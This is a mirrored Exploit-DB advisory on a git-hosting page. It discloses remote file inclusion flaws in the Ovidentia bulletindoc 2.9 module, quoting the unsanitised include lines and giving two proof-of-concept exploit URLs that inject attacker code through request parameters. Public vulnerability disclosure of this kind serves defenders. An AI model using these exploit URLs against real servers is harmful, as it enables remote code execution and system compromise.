bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/38989.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792
PoC1:
/bulletindoc-2-9/programs/admin.php line 2
------------------------------------------------------
include $babInstallPath."admin/acl.php";
------------------------------------------------------
[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]
Description: The $babInstallPath-parameter isn't declared before include.
So an attacker can execute evil-code 'bout this.
PoC2:
/bulletindoc-2-9/programs/main.php line 2
-------------------------------------------------------
require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");
-------------------------------------------------------
[+]Sploit2: http://[s0me0ne/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
Description: The problem is the same as the first. -.-
It's possible to compromise the system.
### The 27 years old, german hacker bd0rk ###
Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm
Reference in a new issue View git blame Copy permalink